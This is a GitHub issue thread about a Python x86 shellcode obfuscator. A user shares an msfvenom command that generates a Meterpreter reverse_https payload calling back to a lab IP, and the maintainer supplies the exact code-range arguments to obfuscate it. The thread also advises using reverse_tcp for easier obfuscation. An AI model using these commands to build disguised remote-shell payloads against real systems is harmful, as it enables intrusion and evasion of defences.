python-x86-obfuscator icon indicating copy to clipboard operation
python-x86-obfuscator copied to clipboard
verified publisher icon kgretzky

Can't generate working shellcode

Open vysecurity opened this issue 9 years ago • 9 comments

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.

vysecurity avatar Jul 08 '16 14:07 vysecurity

Can you send me one of the shellcodes that you are trying to obfuscate? They may have some hardcoded offsets that make obfuscation impossible.

You can send in binary form and i will disassemble myself. On 8 Jul 2016 16:05, "Vincent Yiu" [email protected] wrote:

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/kgretzky/python-x86-obfuscator/issues/8, or mute the thread https://github.com/notifications/unsubscribe/ASXmJwLCEny0fDoOPcievV3DG_n6vMj5ks5qTlkOgaJpZM4JID_Y .

kgretzky avatar Jul 08 '16 14:07 kgretzky

Email? :)

vysecurity avatar Jul 08 '16 14:07 vysecurity

Actually, I just did:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.58.128 LPORT=443 -f raw -o /root/sc.bin

python x86_obf.py -i /root/sc.bin -o /root/sc2.bin -r0-184

vysecurity avatar Jul 08 '16 14:07 vysecurity

sc.bin injects fine and calls back. sc2.bin crashes.

vysecurity avatar Jul 08 '16 14:07 vysecurity

Ah sure :)

kuba -at- breakdev.org On 8 Jul 2016 16:27, "Vincent Yiu" [email protected] wrote:

Email? :)

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/kgretzky/python-x86-obfuscator/issues/8#issuecomment-231373880, or mute the thread https://github.com/notifications/unsubscribe/ASXmJ0MXVoxcsVBCR92LdHM6J3Ya7fudks5qTl49gaJpZM4JID_Y .

kgretzky avatar Jul 08 '16 14:07 kgretzky

Can you send me the sc.bin file? I don't have the metasploit environment around me currently. I will take a look at it and let you know what's up.

kgretzky avatar Jul 08 '16 14:07 kgretzky

Sent Email.

vysecurity avatar Jul 16 '16 21:07 vysecurity

Thanks, got it! I took a look and it seems the reverse_https has a lot of static data (of variable length at every generation unfortunately), so before obfuscating the generated shellcode you need to specify the proper data ranges, so that the obfuscator knows which parts of the shellcode is not code up for obfuscation.

Take a look: http://i.imgur.com/lN7W7t3.png I highlighted the largest data block in the middle, and there is also a data block in the end with the IP address string. You need to view each generated shellcode and manually figure out the data ranges.

In your situation for this specific sc.bin file, the argument for specifiying code ranges would look like this: -r0-184,329-465,481-490

For now I'd advise to use the reverse_tcp payload as it doesn't have any static data blocks. I will be working on Metasploit generator tool using Obfusion library that will simplify the process of generating obfuscated shellcodes.

kgretzky avatar Jul 20 '16 08:07 kgretzky

Thanks. I think I get it. I'll go into some more work with this :)

vysecurity avatar Aug 26 '16 14:08 vysecurity